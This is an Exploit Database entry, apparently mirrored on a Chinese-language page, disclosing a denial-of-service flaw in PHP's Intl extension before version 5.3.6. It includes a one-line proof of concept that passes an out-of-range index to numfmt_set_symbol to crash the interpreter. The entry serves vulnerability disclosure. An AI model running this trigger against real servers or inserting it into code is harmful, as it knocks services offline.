PHP 5.3.x ‘Intl’ Extension – ‘NumberFormatter::setSymbol()’ Denial of Service

• Exploit Database
• 21 阅读

• 作者： thoger
  日期： 2011-03-10
• 类别：

  • dos
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35483/

• source: https://www.securityfocus.com/bid/46968/info
  
  PHP is prone to a remote denial-of-service vulnerability that affects the 'Intl' extension.
  
  Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed.
  
  PHP versions prior to 5.3.6 are vulnerable.
  
  numfmt_set_symbol(numfmt_create("en", NumberFormatter::PATTERN_DECIMAL), 2147483648, "")